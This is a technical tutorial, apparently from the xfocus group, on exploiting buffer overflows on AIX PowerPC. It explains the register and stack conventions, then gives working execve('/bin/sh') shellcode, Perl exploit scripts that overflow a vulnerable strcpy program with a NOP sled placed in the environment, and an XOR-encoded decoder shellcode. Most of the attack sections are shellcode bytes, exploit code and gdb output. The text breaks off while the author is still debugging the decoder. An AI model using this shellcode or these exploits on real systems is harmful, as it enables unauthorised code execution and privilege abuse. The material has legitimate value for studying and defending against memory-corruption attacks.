Author: san (san_at_xfocus.org)
--[ 1 - Familiar with PowerPC architecture(32 bit)
The PowerPC architecture is a Reduced Instruction Set Computer (RISC) architecture, with over two hundred defined instructions. PowerPC is RISC in that most instructions execute in a single cycle and typically perform a single operation (such as loading storage to a register, or storing a register to memory). PowerPC instructions are of uniform length of 32 bits and there are almost 12 instruction formats, which reflect 5 primary classes of instructions:
- branch instructions,
- fixed-point instructions,
- floating-point instructions,
- load and store instructions,
- processor control instructions.
PowerPC's application-level registers are broken into three classes: general-purpose registers (GPRs), floating-point registers (FPRs and Floating-Point Status and Control Register [FPSCR]), and special-purpose registers (SPRs). We can see 38 registers in gdb with "info registers" command. Following, Let's look at each class.
r0 Volatile register used in function prologs
r1 Stack frame pointer
r2 TOC pointer
r3 Volatile parameter and return value register
r4-r10 Volatile registers used for function parameters
r11 Volatile register used in calls by pointer and as an
environment pointer for languages which require one
r12 Volatile register used for exception handling and glink code
r13 Reserved for use as system thread ID
r14-r31 Nonvolatile registers used for local variables
Floating-point registers (FPRs)
f0 Volatile scratch register
f1-f4 Volatile floating point parameter and return value registers
f5-f13 Volatile floating point parameter registers
f14-f31 Nonvolatile registers
Special-purpose registers (SPRs)
LR Link register (volatile)
CTR Loop counter register (volatile)
XER Fixed point exception register (volatile)
FPSCR Floating point status and control register (volatile)
CR0-CR1 Volatile condition code register fields
CR2-CR4 Nonvolatile condition code register fields
CR5-CR7 Volatile condition code register fields
Registers r1, r14 through r31, and f14 through f31 are nonvolatile, which means that they preserve their values across function calls. Functions which use those registers must save the value before changing it, restoring it before the function returns. Register r2 is technically nonvolatile, but it is handled specially during function calls as described below: in some cases the calling function must restore its value after a function call.
Registers r0, r3 through r12, f0 through f13, and the special purpose registers LR, CTR, XER, and FPSCR are volatile, which means that they are not preserved across function calls. Furthermore, registers r0, r2, r11, and r12 may be modified by cross-module calls, so a function can not assume that the values of one of these registers is that placed there by the calling function.
The condition code register fields CR0, CR1, CR5, CR6, and CR7 are volatile. The condition code register fields CR2, CR3, and CR4 are nonvolatile; a function which modifies them must save and restore at least those fields of the CR. Languages that require "environment pointers" shall use r11 for that purpose.
On AIX the svca (sc in a mnemonic notation of PowerPC) instruction is used whenever the operating system services are to be called. The r2 register denotes the system call number and registers r3-r10 are appropriately filled with a given system call arguments. There are two additional prerequisites that must be fulfilled before executing the system call instruction: the LR register must be filled with the return from syscall address value and the crorc cr6, cr6, cr6 instruction must be issued just before the system call.
--[ 2 - Learn AIX PowerPC assemble format
Use gcc -S to compile C program can obtain AIX assembly code. If you are not familiar with AIX PowerPC assemble format, just write a small program in C language.
/* setuid.c
*
* Learn AIX PowerPC assembly
*/
#include
int main()
{
setuid(0);
}
Then compile it use gcc with -S option:
-bash-2.05b$ gcc -S setuid.c
Open setuid.s on current directory:
.file "setuid.c"
.toc
.csect .text[PR]
.align 2
.globl main
.globl .main
.csect main[DS]
main:
.long .main, TOC[tc0], 0
.csect .text[PR]
.main:
.extern __mulh
.extern __mull
.extern __divss
.extern __divus
.extern __quoss
.extern __quous
mflr 0
stw 31,-4(1)
stw 0,8(1)
stwu 1,-72(1)
mr 31,1
li 3,0
bl .setuid
nop
mr 3,0
lwz 1,0(1)
lwz 0,8(1)
mtlr 0
lwz 31,-4(1)
blr
LT..main:
.long 0
.byte 0,0,32,97,128,1,0,1
.long LT..main-.main
.short 4
.byte "main"
.byte 31
.align 2
_section_.text:
.csect .data[RW],3
.long _section_.text
To reduce to fundamental parts, the following is enough:
.globl .main
.csect .text[PR]
.main:
mflr 0
stw 31,-4(1)
stw 0,8(1)
stwu 1,-72(1)
mr 31,1
li 3,0
bl .setuid
nop
mr 3,0
lwz 1,0(1)
lwz 0,8(1)
mtlr 0
lwz 31,-4(1)
blr
--[ 3 - Learn shellcode of AIX PowerPC
B-r00t's PowerPC/OS X (Darwin) Shellcode Assembly is good stuff, although it is OS X but both are PowerPC architecture. We can write shellcode like B-r00t:
-bash-2.05b$ cat simple_execve.s
.globl .main
.csect .text[PR]
.main:
xor. %r5, %r5, %r5 # r5 = NULL
bnel .main # branch to _main if not equal
mflr %r3 # r3 = main + 8
addi %r3, %r3, 32 # r3 = main + 8 + 32 = string
stw %r3, -8(%r1) # argv[0] = string
stw %r5, -4(%r1) # argv[1] = NULL
subi %r4, %r1, 8 # r4 = pointer to argv[]
li %r2, 5 # syscall number = execve
crorc %cr6, %cr6, %cr6 # There are two additional prerequisites that must be fulfilled before executing the system call instruction: the LR register must be filled with the return from syscall address value and the crorc cr6, cr6, cr6 instruction must be issued just before the system call.
svca 0 # execve(r3, r4, r5)
string: # execve(path, argv[], NULL)
.asciz "/bin/sh"
-bash-2.05b$ gcc -o simple_execve simple_execve.s
-bash-2.05b$ ./simple_execve
$
The execve syscall executed correct, and then use objdump check the opcode:
-bash-2.05b$ objdump -d simple_execve|more
...
0000000010000544 <.main>:
10000544: 7c a5 2a 79 xor. r5,r5,r5
10000548: 40 82 ff fd bnel 10000544 <.main>
1000054c: 7c 68 02 a6 mflr r3
10000550: 38 63 00 20 cal r3,32(r3)
10000554: 90 61 ff f8 st r3,-8(r1)
10000558: 90 a1 ff fc st r5,-4(r1)
1000055c: 38 81 ff f8 cal r4,-8(r1)
10000560: 38 40 00 05 lil r2,5
10000564: 4c c6 33 42 crorc 6,6,6
10000568: 44 00 00 02 svca 0
1000056c: 2f 62 69 6e cmpi 6,r2,26990
10000570: 2f 73 68 00 cmpi 6,r19,26624
...
There are some opcodes contain zero. These bytes must be eliminated for the shellcode to suit strcpy etc. Some instructions have reservered bytes, so we can replace it. The opcode of svca is 0x44000002. However, bytes 2 and 3 of the opcode are reserved and therefore not used. So it can be instead of 0x44ffff02. LSD provided a simple shellcode:
/* shellcode.c
*
* ripped from lsd
*/
char shellcode[] = /* 12*4+8 bytes */
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05"
;
int main(void)
{
int jump[2]={(int)shellcode,0};
((*(void (*)())jump)());
}
After compiled this program, use IDAPro to open and disassemble it. In IDAPro window, click shellcode at Names window and press c to disassemble the shellcode data:
.data:200006D8 shellcode: # CODE XREF: .data:200006DC p
.data:200006D8 # DATA XREF: .data:shellcode_TC o
.data:200006D8 7C A5 2A 79 xor. r5, r5, r5 # r5 = NULL
.data:200006DC 40 82 FF FD bnel shellcode # branch to shellcode if not equal
.data:200006E0 7F E8 02 A6 mflr r31 # r31 = .data:200006D8 + 8
.data:200006E4 3B FF 01 20 addi r31, r31, 0x120 # r31 = .data:200006D8 + 8 + 0x120
.data:200006E8 38 7F FF 08 subi r3, r31, 0xF8 # r3 = .data:200006D8 + 8 + 0x120 - 0xF8 = .data:20000708 = string
.data:200006EC 38 9F FF 10 subi r4, r31, 0xF0 # r4 = .data:20000710
.data:200006F0 90 7F FF 10 stw r3, -0xF0(r31) # put address .data:20000708 to .data:20000710
.data:200006F4 90 BF FF 14 stw r5, -0xEC(r31) # put 0 to .data:20000714
.data:200006F8 88 5F FF 0F lbz rtoc, -0xF1(r31)# load syscall number to r2
.data:200006FC 98 BF FF 0F stb r5, -0xF1(r31) # put 0 to .data:2000070F
.data:20000700 4C C6 33 42 crorc 4*cr1+eq, 4*cr1+eq, 4*cr1+eq # Condition Register OR with Comlement
.data:20000700 # ------------------------------------------------------------------------
.data:20000704 44 .byte 0x44 # modified svca
.data:20000705 FF .byte 0xFF
.data:20000706 FF .byte 0xFF
.data:20000707 02 .byte 2
.data:20000708 2F .byte 0x2F # /
.data:20000709 62 .byte 0x62 # b
.data:2000070A 69 .byte 0x69 # i
.data:2000070B 6E .byte 0x6E # n
.data:2000070C 2F .byte 0x2F # /
.data:2000070D 73 .byte 0x73 # s
.data:2000070E 68 .byte 0x68 # h
.data:2000070F 05 .byte 5
IDAPro is more powerful and it's disassembly is more understandability. OK, we know how to write and debug shellcode now.
--[ 4 - Learn overflow technology of AIX PowerPC
There are differences of stack structure between PowerPC and ia32. The PowerPC stack conventions use only a stack pointer (held in register GPR1) and no frame pointer. This configuration assumes a fixed stack frame size, which is known at compile time. Parameters are not passed by pushing them onto the stack. The following is the PowerPC stack:
. Stack before . . Stack after .
. calling a . . calling a .
| procedure | | procedure |
+----------------+- +----------------+-
| Parameter area | | | Parameter area | |
+----------------+ +-Caller +----------------+ +-Caller
| Linkage area | | | Linkage area | |
SP --->+----------------+- +----------------+-
| Stack grows | | Saved registers| |
. down . +----------------+ |
. | . | Local variables| |
v +----------------+ +-Callee
| Parameter area | |
+----------------+ |
| Linkage area | |
SP --->+----------------+-
| Stack grows |
. down .
. | .
v
The PowerPC runtime environment uses a grow-down stack that contains linkage information, local variables, and a routine's parameter information.
The calling routine's linkage area holds a number of values, some of which are saved by the calling routine and some by the called routine. It's structure as following:
+24+----------------+
| Saved TOC |
+20+----------------+
| Reserved |
+16+----------------+
| Reserved |
+12+----------------+
| Saved LR |
+8+----------------+
| Saved CR |
+4+----------------+
| Saved SP |
SP --->+----------------+
The Link Register (LR) value is saved at 8(SP) by the called routine if it chooses to do so.
The Condition Register (CR) value may be saved at 4(SP) by the called routine. As with the Link Register value, the called routine is not required to save this value.
The stack pointer is always saved by the calling routine as part of its stack frame.
The parameter area has space for the parameters of any routines the caller calls (not the parameters of the caller itself). Since the calling routine might call several different routines, the parameter area must be large enough to accommodate the largest parameter list of all the routines the caller calls. It is the calling routine's responsibility for setting up the parameter area before each call to some other routine, and the called routine's responsibility for accessing the parameters placed within it.
There are three instructions when function return on ia32:
mov esp,ebp ; esp point to prior frame
pop ebp
ret ; execute address that saved at esp+4
There are some instructions when function return on AIX PowerPC:
lwz r1,0(r1) # r1 point to prior frame
lwz r0,8(r1) # load saved lr to r0
mtlr r0 # lr=r0
lwz r31,-4(r1) #
blr # execute address that saved at lr
Although there are differences of stack structure between PowerPC and ia32, but they have the same overflow technology. We need overwrite ebp+4 of current frame to return our control address on ia32, and we need overwrite r1+8 of prior frame to return our control address on AIX PowerPC.
Running the simple_overflow program in GDB shows that the control of the saved return address (previous LR value) is possible.
-bash-2.05b$ cat simple_overflow.c
/* simple_overflow.c
*
* Simple program to demonstrate buffer overflows
* on the PowerPC architecture.
*/
#include
#include
char largebuff[] =
"123451234512345123451234=PRESERVEDSPACE=ABCD";
int main (void)
{
char smallbuff[16];
strcpy (smallbuff, largebuff);
}
-bash-2.05b$ gcc -o simple_overflow simple_overflow.c
-bash-2.05b$ gdb -q simple_overflow
(gdb) r
Starting program: /home/san/simple_overflow
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i reg
r0 0x41424344 1094861636
r1 0x2ff22bb0 804400048
r2 0x20000e70 536874608
r3 0x20 32
r4 0x20000534 536872244
r5 0x2ff22bbc 804400060
r6 0x0 0
r7 0x0 0
r8 0x0 0
r9 0x80808080 -2139062144
r10 0x7f7f7f7f 2139062143
r11 0x4 4
r12 0x80808080 -2139062144
r13 0xdeadbeef -559038737
r14 0x1 1
r15 0x2ff22c00 804400128
r16 0x2ff22c08 804400136
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0x20000460 536872032
r29 0x10000000 268435456
r30 0x3 3
r31 0x53455256 1397051990
pc 0x41424344 1094861636
ps 0x4000d032 1073795122
cr 0x22222842 572663874
lr 0x41424344 1094861636
ctr 0x4 4
xer 0x0 0
fpscr 0x0 0
vscr 0x0 0
vrsave 0x0 0
(gdb) x/8x $r1
0x2ff22bb0: 0x45445350 0x4143453d 0x41424344 0x00000000
0x2ff22bc0: 0x00000000 0x20000e70 0x00000000 0x00000000
Register pc has been overwritten to ABCD and this is our controled content.
(gdb) disas main
Dump of assembler code for function main:
0x1000054c : mflr r0
0x10000550 : stw r31,-4(r1)
0x10000554 : stw r0,8(r1)
0x10000558 : stwu r1,-88(r1)
0x1000055c : mr r31,r1
0x10000560 : addi r3,r31,56
0x10000564 : lwz r4,80(r2)
0x10000568 : bl 0x10006fa0
0x1000056c : nop
0x10000570 : mr r3,r0
0x10000574 : lwz r1,0(r1)
0x10000578 : lwz r0,8(r1)
0x1000057c : mtlr r0
0x10000580 : lwz r31,-4(r1)
0x10000584 : blr
0x10000588 : .long 0x0
0x1000058c : .long 0x2061
0x10000590 : lwz r0,1(r1)
0x10000594 : .long 0x3c
0x10000598 : .long 0x46d61
0x1000059c : xori r14,r11,7936
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x10000560
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/simple_overflow
Breakpoint 1, 0x10000560 in main ()
(gdb) display/i $pc
1: x/i $pc 0x10000560 : addi r3,r31,56
(gdb) x/20x $r1
0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000
0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001
0x2ff22b88: 0x00000000 0xdeadbeef 0xdeadbeef 0xdeadbeef
0x2ff22b98: 0xdeadbeef 0xdeadbeef 0x20000460 0x10000000
(gdb)
0x2ff22ba8: 0x00000003 0x20000460 0x00000000 0x44222802
0x2ff22bb8: 0x100001cc 0x00000000 0x00000000 0x20000e70
0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b58 is the current sp, and it contains prior stack frame address(0x2ff22bb0). So we can get the lr value that saved in prior stack frame, and it is 0x100001cc. The program will execute this address after main function return.
(gdb) until *0x1000056c
0x1000056c in main ()
1: x/i $pc 0x1000056c : nop
(gdb) i reg
r0 0x20 32
r1 0x2ff22b58 804399960
r2 0x20000e70 536874608
r3 0x2ff22b90 804400016
r4 0x20000534 536872244
r5 0x2ff22bbc 804400060
r6 0x0 0
r7 0x0 0
r8 0x0 0
r9 0x80808080 -2139062144
r10 0x7f7f7f7f 2139062143
r11 0x4 4
r12 0x80808080 -2139062144
r13 0xdeadbeef -559038737
r14 0x1 1
r15 0x2ff22c00 804400128
r16 0x2ff22c08 804400136
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0x20000460 536872032
r29 0x10000000 268435456
r30 0x3 3
r31 0x2ff22b58 804399960
pc 0x1000056c 268436844
ps 0x2d032 184370
cr 0x22222842 572663874
lr 0x1000056c 268436844
ctr 0x4 4
xer 0x0 0
fpscr 0x0 0
vscr 0x0 0
vrsave 0x0 0
(gdb) x/20x $r1
0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000
0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001
0x2ff22b88: 0x00000000 0xdeadbeef 0x31323334 0x35313233
0x2ff22b98: 0x34353132 0x33343531 0x32333435 0x31323334
(gdb)
0x2ff22ba8: 0x3d505245 0x53455256 0x45445350 0x4143453d
0x2ff22bb8: 0x41424344 0x00000000 0x00000000 0x20000e70
0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000
After strcpy, the lr value that saved in prior stack frame was overwritten to 0x41424344.
(gdb) ni
0x10000570 in main ()
1: x/i $pc 0x10000570 : mr r3,r0
(gdb)
0x10000574 in main ()
1: x/i $pc 0x10000574 : lwz r1,0(r1)
(gdb)
0x10000578 in main ()
1: x/i $pc 0x10000578 : lwz r0,8(r1)
(gdb)
0x1000057c in main ()
1: x/i $pc 0x1000057c : mtlr r0
(gdb)
0x10000580 in main ()
1: x/i $pc 0x10000580 : lwz r31,-4(r1)
(gdb)
0x10000584 in main ()
1: x/i $pc 0x10000584 : blr
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
1: x/i $pc 0x41424344: Cannot access memory at address 0x41424344
Disabling display 1 to avoid infinite recursion.
These instructions has been introduced before. The program will execute the lr value that saved in prior stack frame at r1+8.
--[ 5 - How to attack overflow vulnerability on AIX PowerPC
Now we know overflow process, then let's try to attack overflow vulnerability. The following program is the vulnerability.
-bash-2.05b$ cat vulnerable.c
/* vulnerable.c
*
* Vulnerable program on the PowerPC architecture.
*/
#include
#include
int main (int argc, char *argv[])
{
char vulnbuff[16];
strcpy (vulnbuff, argv[1]);
printf ("\n%s\n", vulnbuff);
getchar(); /* for debug */
}
-bash-2.05b$ gcc -o vulnerable vulnerable.c
0x2ff22fff seems to be stack bottom of AIX. The following is the AIX's stack structure:
Stack bottom
+----------------+ 0x2ff22fff
| Reserverd |
+----------------+
| Enviroment |
+----------------+
| args |
+----------------+
| path |
+----------------+
| Stack frames |
SP --->+----------------+
| Stack grows |
. down .
. | .
. v .
Enviroment address can be guessed more exactly, so we put lots of nop instructions and the shellcode into the enviroment.
-bash-2.05b$ cat exploit.pl
#!/usr/bin/perl
#
# exploit.pl
# exploit program vulnerable
$CMD="/home/san/vulnerable";
$SHELLCODE=
"\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd". # /* bnel */
"\x7f\xe8\x02\xa6". # /* mflr r31 */
"\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08". # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10". # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10". # /* st r3,-240(r31) */
"\x90\xbf\xff\x14". # /* st r5,-236(r31) */
"\x88\x5f\xff\x0f". # /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f". # /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42". # /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02". # /* svca */
"/bin/sh".
"\x05";
$NOP="\x60\x60\x60\x60"x800;
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x11;
Try it.
-bash-2.05b$ ./exploit.pl
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
Use gdb debug the vulnerable program on the another tty:
-bash-2.05b$ ps aux|grep vul
san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul
san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera
-bash-2.05b$ gdb vulnerable 44544
GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix5.1.0.0"...
Attaching to program: /home/san/vulnerable, process 44544
0xd01ea254 in read () from /usr/lib/libc.a(shr.o)
(gdb) disas main
Dump of assembler code for function main:
0x10000544 : mflr r0
0x10000548 : stw r31,-4(r1)
0x1000054c : stw r0,8(r1)
0x10000550 : stwu r1,-88(r1)
0x10000554 : mr r31,r1
0x10000558 : stw r3,112(r31)
0x1000055c : stw r4,116(r31)
0x10000560 : lwz r9,116(r31)
0x10000564 : addi r9,r9,4
0x10000568 : addi r3,r31,56
0x1000056c : lwz r4,0(r9)
0x10000570 : bl 0x10007000
0x10000574 : nop
0x10000578 : lwz r3,88(r2)
0x1000057c : addi r4,r31,56
0x10000580 : bl 0x100073ec
0x10000584 : lwz r2,20(r1)
0x10000588 : lwz r11,92(r2)
0x1000058c : lwz r9,92(r2)
0x10000590 : lwz r9,4(r9)
0x10000594 : addi r0,r9,-1
0x10000598 : stw r0,4(r11)
0x1000059c : cmpwi r0,0
0x100005a0 : bge- 0x100005b4
0x100005a4 : lwz r3,92(r2)
0x100005a8 : bl 0x1000747c <__filbuf>
0x100005ac : lwz r2,20(r1)
0x100005b0 : b 0x100005c8
0x100005b4 : lwz r11,92(r2)
0x100005b8 : lwz r9,92(r2)
0x100005bc : lwz r9,0(r9)
0x100005c0 : addi r0,r9,1
0x100005c4 : stw r0,0(r11)
0x100005c8 : mr r3,r0
0x100005cc : lwz r1,0(r1)
0x100005d0 : lwz r0,8(r1)
0x100005d4 : mtlr r0
0x100005d8 : lwz r31,-4(r1)
0x100005dc : blr
0x100005e0 : .long 0x0
0x100005e4 : .long 0x2061
0x100005e8 : lwz r0,513(r1)
---Type to continue, or q to quit---
0x100005ec : .long 0x0
0x100005f0 : .long 0x9c
0x100005f4 : .long 0x46d61
0x100005f8 : xori r14,r11,7936
End of assembler dump.
(gdb) b *0x100005dc
Breakpoint 1 at 0x100005dc
(gdb) c
Continuing.
Press any key at the tty which running exploit.pl, and the gdb debug window continues:
Breakpoint 1, 0x100005dc in main ()
(gdb) i reg
r0 0x100001cc 268435916
r1 0x2ff22210 804397584
r2 0x20000ee8 536874728
r3 0xf00890f1 -267874063
r4 0xf00890f0 -267874064
r5 0x0 0
r6 0xd032 53298
r7 0x0 0
r8 0x60000000 1610612736
r9 0x60002449 1610622025
r10 0x0 0
r11 0x600026c8 1610622664
r12 0x100005ac 268436908
r13 0xdeadbeef -559038737
r14 0x2 2
r15 0x2ff22264 804397668
r16 0x2ff22270 804397680
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0x20000520 536872224
r29 0x10000000 268435456
r30 0x3 3
r31 0x2ff22b40 804399936
pc 0x100005dc 268436956
ps 0x2d032 184370
cnd 0x24222422 606217250
lr 0x100001cc 268435916
cnt 0x0 0
xer 0x0 0
mq 0x0 0
fpscr 0x0 0
(gdb) x/20x $r1
(gdb) x/20x $r1
0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000
0x2ff22220: 0x00000000 0x20000ee8 0x00000002 0x2ff2225c
0x2ff22230: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22240: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22250: 0x00000000 0x00000000 0x00000000 0x2ff22270
(gdb) x/20x 0x2ff22b40
0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b60: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b70: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b80: 0x60606060 0x60606060 0x60606060 0x60606060
...
...
...
(gdb)
0x2ff22f00: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f10: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8
0x2ff22f40: 0x02a63bff 0x0120387f 0xff08389f 0xff10907f
The lr register has been overwritten to 0x2ff22b40. Program will execute this address after function returning, and there are lots of nop instructions after this address until the shellcode appeared. But we must be notice the align problem. The following exploit avoid this problem:
#!/usr/bin/perl
#
# exploit1.pl
# exploit program vulnerable
$CMD="/home/san/vulnerable";
$SHELLCODE=
"\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd". # /* bnel */
"\x7f\xe8\x02\xa6". # /* mflr r31 */
"\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08". # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10". # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10". # /* st r3,-240(r31) */
"\x90\xbf\xff\x14". # /* st r5,-236(r31) */
"\x88\x5f\xff\x0f". # /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f". # /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42". # /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02". # /* svca */
"/bin/sh".
"\x05";
$NOP="\x60\x60\x60\x60"x800;
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x11;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $j .$NOP.$SHELLCODE;
$ret = system $CMD ,"A"x $i ."\x2f\xf2\x2b\x40"x11;
}
}
-bash-2.05b$ ./exploit1.pl
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
$
It seems good!
--[ 6 - Bypass I-cache Decoder shellcode is very simple in ia32 architechture.
Although PowerPC instructions cann't access memory direct except load and store instructions, but we can write a decoder shellcode as ia32.
char shellcode[] =
// decoder
"\x7c\xa5\x2a\x79" // xor. %r5, %r5, %r5
"\x40\x82\xff\xfd" // bnel .main
"\x7c\x68\x02\xa6" // mflr %r3
"\x38\x63\x01\x01" // addi %r3, %r3, 0x101
"\x38\x63\xff\x26" // addi %r3, %r3, -0xDA # r3 point start of real shellcode-1
"\x39\x20\x01\x01" // li %r9, 0x101
"\x39\x29\xff\x23" // addi %r9, %r9, -0xDD # shellcode size+1
"\x7c\xc9\x18\xae" // lbzx %r6, %r9, %r3 # read a character
"\x68\xc7\xfe\xfe" // xori %r7, %r6, 0xFEFE # xor
"\x7c\xe9\x19\xae" // stbx %r7, %r9, %r3 # store a character
"\x35\x29\xff\xff" // subic. %r9, %r9, 1
"\x40\x82\xff\xf0" // bne Loop # loop
// real shellcode
"\xc6\x9d\xfe\xe3" // addi %r3, %r3, 29
"\x6e\x9f\x01\x06" // stw %r3, -8(%r1)
"\x6e\x5f\x01\x02" // stw %r5, -4(%r1)
"\xc6\x7f\x01\x06" // subi %r4, %r1, 8
"\xc6\xbe\xfe\xfb" // li %r2, 5
"\xb2\x38\xcd\xbc" // crorc %cr6, %cr6, %cr6
"\xba\xfe\xfe\xfc" // svca 0
"\xd1\x9c\x97\x90" // .byte '/', 'b', 'i', 'n',
"\xd1\x8d\x96\xfe" // '/', 's', 'h', 0x0
;
int main() {
int jump[2]={(int)shellcode,0};
((*(void (*)())jump)());
}
The first part is decoder. r3 points to the address of the front of real shellcode. r9 is the counter, whose size is one more than real shellcode. It will do xor operate from last byte of real shellcode. When I run the program in gdb, I find the following problem:
(gdb) r
Starting program: /home/san/test
Program received signal SIGSEGV, Segmentation fault.
0x20000418 in shellcode ()
(gdb) x/8i $pc
0x20000418 : addi r3,r3,29
0x2000041c : stw r3,-8(r1)
0x20000420 : stw r5,-4(r1)
0x20000424 : addi r4,r1,-8
0x20000428 : li r2,5
0x2000042c : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq
0x20000430 : sc
0x20000434 : cmpdi cr6,r2,26990
(gdb) x/24x $pc-48
0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101
0x200003f8 : 0x3863ff26 0x39200101 0x3929ff23 0x7cc918ae
0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0
0x20000418 : 0x3863001d 0x9061fff8 0x90a1fffc 0x3881fff8
0x20000428 : 0x38400005 0x4cc63342 0x44000002 0x2f62696e
0x20000438 : 0x2f736800 0x00000000 0x100005a0 0x00000000
(gdb)
The program halts at 0x20000418, and the instruction is "addi r3,r3,29". This instruction has no problem, and all of real shellcode seems decoded correctly, but the shellcode failed. When I break at 0x20000418, it is in different way after run:
(gdb) b *0x20000418
Breakpoint 1 at 0x20000418
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/test
Breakpoint 1, 0x20000418 in shellcode ()
(gdb) x/8i $pc
0x20000418 : lfsu f20,-285(r29)
0x2000041c : stw r3,-8(r1)
0x20000420 : stw r5,-4(r1)
0x20000424 : addi r4,r1,-8
0x20000428 : li r2,5
0x2000042c : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq
0x20000430 : sc
0x20000434 : cmpdi cr6,r2,26990
(gdb) x/24x $pc-48
0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101
0x200003f8 : 0x3863ff26 0x39200101 0x3929ff23 0x7cc918ae
0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0
0x20000418 : 0xc69dfee3 0x9061fff8 0x90a1fffc 0x3881fff8
0x20000428 : 0x38400005 0x4cc63342 0x44000002 0x2f62696e
